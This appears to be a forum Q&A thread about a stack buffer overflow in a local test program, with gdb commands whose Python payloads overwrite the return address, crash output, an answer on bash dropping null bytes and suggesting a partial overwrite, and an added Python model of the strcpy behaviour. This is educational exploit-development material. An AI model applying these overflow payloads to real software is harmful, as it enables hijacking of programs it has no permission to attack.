Buffer overflow for small return address



  • I am using a buffer overflow to overwrite the return address and call another function. The name of the function I call by overwriting the return address is not_called. Here is how I create the payload:

    (gdb) r $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x3b\x42\x08\x08")')
    

    The program works in the above case and the not_called function is called. The problem arises when the address of not_called is in this format: 0x57d. When I create the payload as follows:

    (gdb) r $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x7d\x05\x00\x00")')
    

    I get the following error and the program won't work.

    (gdb) r $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x7d\x05\x00\x00")')
    The program being debugged has been started already.
    Start it from the beginning? (y or n) y
    Starting program: /home/aditya/Desktop/victim $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x7d\x05\x00\x00")')
    /bin/bash: warning: command substitution: ignored null byte in input
    0xffffd07c
    
    Program received signal SIGSEGV, Segmentation fault.
    0x5600057d in ?? ()
    

    If you look at the address at SIGSEGV, it is 0x5600057d; it should have been 0x0000057d.

    For example, if I try some random address such as 0x3412057d, you can see that the seg fault occurs at that address.

    Starting program: /home/aditya/Desktop/victim $(python -c 'import sys; sys.stdout.write("A"*112 +"\x7d\x05\x12\x34")')
    0xffffd06c
    
    Program received signal SIGSEGV, Segmentation fault.
    0x3412057d in ?? ()
    
    

    I can see that bash is also giving a warning about null bytes. Does this have something to do with it? How can I pass such a small address?



  • The issue is not that the address is "small", but that you are trying to print null bytes (\x00) as a shell argument. This is not possible with bash, to my knowledge, as it uses null-terminated strings.

    Depending on the program and exploit, if the memory you are overwriting already contains null bytes, you may not need to write them again. For example, you may be able to do a partial overwrite with just \x7d\x05.

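As an added illustration of the answer above (example code, not from either poster), the following Python models what happens to the argument on its way into the program: bash drops the NUL bytes during command substitution, and an unchecked strcpy() of argv[1] then copies the C-string terminator into the frame, which is why the question observes 0x5600057d rather than 0x0000057d. The frame layout (0x6c-byte buffer, saved EBP, saved return address) is taken from the question; the original return address value is an assumption.

```python
import struct
import subprocess

# Frame layout taken from the question: 0x6c-byte buffer, then the saved EBP
# ("BBBB"), then the 4-byte little-endian saved return address.
BUF_LEN = 0x6c
SAVED_EBP_LEN = 4
RET_OFF = BUF_LEN + SAVED_EBP_LEN
# Assumed original return address of a 32-bit PIE binary; only its high
# byte (0x56) matters for the partial-overwrite case below.
ORIG_RET = 0x56555610


def bash_substitution(output: bytes) -> bytes:
    """Model $(...): bash drops NUL bytes from the substituted output, which is
    the 'ignored null byte in input' warning shown in the question."""
    return output.replace(b"\x00", b"")


def argv_accepts_nul(arg: bytes) -> bool:
    """Even without bash, an argv entry cannot hold a NUL: execve() takes
    C strings, and Python refuses such an argument before fork()."""
    try:
        subprocess.run(["/bin/true", arg], check=False)
        return True
    except ValueError:        # "embedded null byte"
        return False


def saved_ret_after_strcpy(arg: bytes, orig_ret: int = ORIG_RET) -> int:
    """Model an unchecked strcpy(buf, argv[1]) and return the saved return
    address afterwards. argv[1] is a C string, so the copy includes the
    terminating NUL, which lands in the frame as one extra zero byte."""
    frame = bytearray(RET_OFF) + struct.pack("<I", orig_ret)
    copied = arg + b"\x00"                 # strcpy copies the terminator too
    frame[:len(copied)] = copied           # no bounds check: the overflow
    return struct.unpack("<I", bytes(frame[RET_OFF:RET_OFF + 4]))[0]


if __name__ == "__main__":
    # Constructed inputs mirroring the two payloads in the question.
    full = b"A" * BUF_LEN + b"BBBB" + b"\x3b\x42\x08\x08"
    short = b"A" * BUF_LEN + b"BBBB" + b"\x7d\x05\x00\x00"
    print(hex(saved_ret_after_strcpy(bash_substitution(full))))   # 0x808423b
    print(hex(saved_ret_after_strcpy(bash_substitution(short))))  # 0x5600057d
    print(argv_accepts_nul(b"\x7d\x05\x00\x00"))                  # False
```

The second case shows the high byte of the original return address surviving because only three bytes (two from the payload plus the terminator) were written over it.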

